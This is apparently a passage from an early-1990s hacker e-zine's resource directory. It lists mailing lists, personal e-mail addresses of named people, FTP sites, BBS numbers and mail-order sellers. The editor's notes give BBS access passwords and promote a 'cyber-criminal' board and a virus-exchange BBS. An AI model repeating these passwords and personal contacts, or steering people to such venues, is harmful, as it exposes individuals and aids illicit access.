telecom-priv-request@pica.army.mil
|
||
-deals with privacy aspects of telecommunications
|
||
most of the conversation revolves around Caller-ID and such
|
||
|
||
Telecom Digest
|
||
telecom-request@eecs.nwu.edu
|
||
-deals with all aspects of telecommunications
|
||
|
||
Virus-l Digest
|
||
krvw@cert.sei.cmu.edu
|
||
(also virus-l on BITNET)
|
||
-discussion of viruses and all aspects of 'em
|
||
|
||
Worldview - Der Weltanschauung
|
||
fox@nuchat.sccsi.com
|
||
-hacking, computer underground, church of subgenius, political, etc.
|
||
|
||
_____________________________________________________________________________
|
||
| |
|
||
| E-Mail Addresses: |
|
||
|____________________|
|
||
|
||
(please use care and consideration when mailing to these people)
|
||
|
||
Aristotle uk05744@ukpr.uky.edu
|
||
John Perry Barlow barlow@well.sf.ca.us
|
||
Dorothy Denning denning@cs.georgetown.edu
|
||
Peter J Denning pjd@cs.gwu.edu
|
||
Desert Fox dfox@taronga.com
|
||
Dispater dispater@stormking.com
|
||
The EFF eff@eff.org
|
||
Freaker's Bureau Int'l au530@cleveland.freenet.edu
|
||
Gatsby gatsby@ryptyde.tcs.com
|
||
Mike Godwin mnemonic@eff.org
|
||
Emmanuel Goldstein emmanuel@well.sf.ca.us
|
||
Ground Zero gzero@tronsbox.xei.com
|
||
Hactic ropg@ooc.uva.nl
|
||
Hawkeye (put this art. together)ahawks@nyx.cs.du.edu
|
||
Intertek steve@cs.ucsb.edu
|
||
Judge Dredd elisem@nuchat.sccsi.com
|
||
Mitch Kapor mkapor@eff.org
|
||
Knight Lightning (Craig Neidorf)knight@well.sf.ca.us
|
||
kl@stormking.com
|
||
Lord Macduff macduff@nuchat.sccsi.com
|
||
Mentor (Lloyd Blankenship) cs.utexas.edu!dogface!fnordbox!loydb
|
||
Mondo 2000 mondo2000@mcimail.mci.com
|
||
Gordon Meyer 72307.1502@compuserve.com
|
||
Peter G Neumann neumann@csl.sri.com
|
||
Pengo (Hans Heubner) hans@trabant.at
|
||
John S Quarterman jsq@tic.com
|
||
Len Rose len@netsys.netsys.com
|
||
RU Sirius rusirius@well.sf.ca.us
|
||
Cliff Stoll cliff@cfa.harvard.edu
|
||
Michael Synergy synergy@metaphor.com
|
||
Jim Thomas tk0jut1@niu.bitnet
|
||
Tuc tuc@stormking.com
|
||
2600 2600@well.sf.ca.us
|
||
|
||
[Editor's note: How about Eric S. Raymond author of 'The New Hacker's
|
||
Dictionary'? He is at: eric@snark.thyrsus.com.
|
||
|
||
Also Belgorath provides these alternate addresses:
|
||
|
||
Hans Huebner (aka Pengo) is hans@trabant.artcom.de, or
|
||
hans@skoda.vie.artcom.de
|
||
|
||
Cliff Stoll (No known alias) is stoll@earthquake.berkeley.edu]
|
||
|
||
_____________________________________________________________________________
|
||
| |
|
||
| FTP Sites: |
|
||
|______________|
|
||
|
||
(all of these sites carry either computer underground information, information
|
||
on drugs, music, subgenius, etc.)
|
||
|
||
18.26.0.36 lcs.mit.edu
|
||
18.26.0.179 zurich.ai.mit.edu
|
||
128.6.4.15 pyrite.rutgers.edu
|
||
128.6.60.6 quartz.rutgers.edu
|
||
128.8.2.114 sayshell.umd.@edu
|
||
128.83.132.20 ??
|
||
128.95.136.1 milton.u.washington.edu
|
||
128.100.3.6 ftp.cs.toronto.edu
|
||
128.135.46.7 ??
|
||
128.135.252.7 ??
|
||
128.174.5.50 @uxc.@cso.@uiuc.@edu
|
||
128.214.6.100 @nic.@funet.fi
|
||
128.235.33.1 ??
|
||
128.252.135.4 @wuarchive.@wustl.@edu
|
||
129.173.4.5 cs.dal.ca
|
||
130.18.64.2 ??
|
||
130.43.2.3 bric-a-brac.apple.com
|
||
130.56.96.2 ??
|
||
130.71.192.18 stolaf.edu
|
||
130.234.0.1 jyu.fi
|
||
131.188.31.3 faui43.informatik.uni-erlangen.de
|
||
131.210.1.4 cs.uwp.edu
|
||
133.137.4.3 ??
|
||
134.60.66.21 ??
|
||
134.95.132.2 aix370.rrz.uni-koeln.de
|
||
137.39.1.9 uunet.uu.net
|
||
146.169.3.7 ??
|
||
192.88.144.4 eff.org
|
||
192.88.209.5 cert.sei.cmu.edu
|
||
_____________________________________________________________________________
|
||
| |
|
||
| BBSes: |
|
||
|__________|
|
||
201.451.3063 Wrong Number
|
||
203.485.0088 Rune Stone
|
||
203.628.9660 Dark Shadows
|
||
206.454.0075 Manta lair
|
||
209.526.3194 Tequilla Willie's Great Subterranean Carnival
|
||
214.324.3501 KeelyNet
|
||
214.522.5321 Dead Zone
|
||
215.449.1902 Time Enough for Love BBS
|
||
303.438.1481 The Kracker Box
|
||
303.871.4824 Nyx (public access unix)
|
||
312.528.5020 Ripco
|
||
401.847.2603 Underground
|
||
414.789.4210 PC Exec
|
||
415.332.6106 The Well
|
||
415.472.5527 The Cyberden
|
||
502.499.8933 Blitzkrieg
|
||
503.635.2615 Awakening Technology
|
||
512.447.4449 The Illuminati BBS
|
||
517.337.7319 Pure Nihilism
|
||
602.861.3167 Frayed Ends
|
||
617.475.6187 Convent
|
||
617.861.8976 The Works
|
||
618.549.4955 Free Speech
|
||
708.672.5426 World Trade Center
|
||
713.242.6853 Face-2-Face
|
||
718.358.9209 Switchboard
|
||
718.428.6776 Milliways
|
||
806.794.4362 Demon Roach Underground
|
||
914.761.6877 Uncensored
|
||
916.673.8412 Greenpeace's Inverted Granola Bar
|
||
|
||
--
|
||
|
||
[Editor's note: The Underground is no longer up (I moved). Perhaps at a
|
||
later date I will put it back up.
|
||
|
||
Other Boards I know about:
|
||
|
||
408.241.9760 NetCom - Network Access
|
||
|
||
408.245.7726 darkside.com (The Waffle support BBS)
|
||
|
||
408.867.7400 Spies in the Wire
|
||
Most Notorius hangout for hardened Cyber-
|
||
Criminals. Ask for access to 'The Good Stuff'
|
||
and tell them Max sent ya.
|
||
|
||
602.894.1757 Unphamiliar Territory
|
||
NUP (New user Password) 'Bunnylust'
|
||
|
||
717.361.0947 Digital Warfare
|
||
Phalcon-Skism, 40 Hex Mag, Viruses
|
||
(Sorry, forgot the NUP)
|
||
|
||
916.481.2306 Phun Line
|
||
Password 'Darkness has Fallen'
|
||
|
||
359.2.20.4198 Virus eXchange BBS in Sofia, Bulgaria
|
||
Working hours:
|
||
20:00 - 06:00 GMT (in the winter)
|
||
19:00 - 05:00 GMT (in the summer)
|
||
|
||
Also the NUP for Blitzkrieg is 'Columbian Coke'.]
|
||
_____________________________________________________________________________
|
||
| |
|
||
| Merchandise/Companies: |
|
||
|__________________________|
|
||
|
||
(a lot of the companies on this list are on the very edge of the underground,
|
||
and would not exist but for the 1st amendment - please use caution and care
|
||
when dealing with these people, and don't abuse them, otherwise you'll ruin it
|
||
for us all!)
|
||
|
||
Abbie Yo-Yo Inc.
|
||
PO Box 15
|
||
Worcester, MA 01613
|
||
-things related to Abbie Hoffman
|
||
|
||
Amok
|
||
PO Box 861867 Terminal Annex
|
||
Los Angeles, CA 90086-1867
|
||
-hard to find/underground books
|
||
catalog is a whopping $9 (400 pages)
|
||
|
||
Autodesk, Inc.
|
||
2320 Marinship Way
|
||
Sausalito, CA 94965
|
||
-makers of Chaos software. $59.95
|
||
|
||
Books by Phone
|
||
Box 522
|
||
Berkeley, CA 94701
|
||
800.858.2665 (orders)
|
||
510.548.2124 (info)
|
||
-large library of hard-to-find books related to CP, drugs, etc.
|
||
nice resource, but you pay a lot for it :-)
|
||
|
||
Consumertronics
|
||
2011 Crescent Dr.
|
||
PO Drawer 537
|
||
Alamogordo, NM 88310
|
||
505.434.0234
|
||
500.434.0234 (fax - orders only)
|
||
-hacking/phreaking manuals
|
||
|
||
Feral House Productions
|
||
PO Box 861893
|
||
Los Angeles, CA 90086-1893
|
||
-obscure books
|
||
|
||
Further Connections
|
||
Waves Forest
|
||
PO Box 768
|
||
Monterey, CA 93940
|
||
-fringe science
|
||
|
||
Kodak's Center for Creative Imagining
|
||
800.428.7400
|
||
-offers classes in electronic imaging "taught by artists and industry
|
||
experts with state-of-the-art technology"
|
||
anyway, call 'em and ask 'em for their catalogue - might be decent
|
||
(at least the ad in Mondo looks nifty :-)
|
||
|
||
Loopmanics, Ltd.
|
||
PO Box 1197
|
||
Port Townsend, WA 98368
|
||
-carries a large collection of underground/hard-to-find books and stuff
|
||
send for a catalog
|
||
|
||
NewTek, Inc.
|
||
215 SE 8th St.
|
||
Topeka, KS 66603
|
||
800.843.8934
|
||
-makers of the great Video Toaster
|
||
send 'em $4.95 for a demo tape of what the Video Toaster does
|
||
|
||
Paladin Press
|
||
PO Box 1307
|
||
Boulder, CO 80306
|
||
-obscure books
|
||
|
||
Re/Search Publications
|
||
70 Romolo Street #B
|
||
San Franssico, CA 94133
|
||
|
||
Rip Off Press
|
||
PO Box 4686
|
||
Auburn, CA 96504
|
||
|
||
Sense8
|
||
1001 Bridgeway #477
|
||
sausalito, CA 94965
|
||
415.331.6318
|
||
415.331.9148 (fax)
|
||
-vr firm
|
||
|
||
Survival Books
|
||
11106 Magnolia Blvd.
|
||
North Hollywood, CA 91601
|
||
|
||
TOPYUS (Psychic TV)
|
||
PO Box 18223
|
||
Denver, CO 80218
|
||
-Genesis P-Orridge's Psychic TV
|
||
send a SASE for info on Psychic TV, catalogs, albums, t-shirts,
|
||
videos, books, etc.
|
||
|
||
Virtual Research
|
||
1313 Socorro Ave
|
||
Sunnyvale, CA 94089
|
||
408.739.7114
|
||
-a vr firm
|
||
|
||
VPL Research, Inc.
|
||
656 Bair Island Rd. Suite 304
|
||
Redwood, CA 94063
|
||
415.361.1710
|
||
-Jaron Lanier's famous virtual reality firm
|
||
|
||
Zentech
|
||
Box 138
|
||
Morgan Bay Rd.
|
||
Surry, ME 04684
|
||
-cyberpunk, virtual reality merchandise
|
||
|
||
_____________________________________________________________________________
|
||
| |
|
||
| see ya! |
|
||
|___________|
|
||
Welp, that looks like it for now. Have fun!
|
||
|
||
Again, if you have any questions/comments/concerns/criticisms/corrections or
|
||
any additional info, please contact me at ahawks@nyx.cs.du.edu - or on The
|
||
Kracker Box BBS at 303.438.1481.
|
||
|
||
I can be reached at: ahawks@nyx.cs.du.edu, or ahawks@isis.cs.du.edu.
|
||
|
||
------------------------------------------------------------------------------
|
||
##############################################################################
|
||
------------------------------------------------------------------------------
|
||
|
||
Personal Notes: Hello to the RI Hackers from the New Texas Hacker.
|
||
Metacom2 send me mail!
|
||
|
||
Well folks, thats all for DFP #4.
|
||
|
||
Keep that e-mail coming!
|
||
|
||
|
||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||
-= Max Cray =- Freedom
|
||
Net: underg%max@uunet.uu.net Justice
|
||
UUCP: ...!uunet!underg!max Equality
|
||
CI$: 76334,2203 Responsibility
|
||
|
||
|
||
|
||
|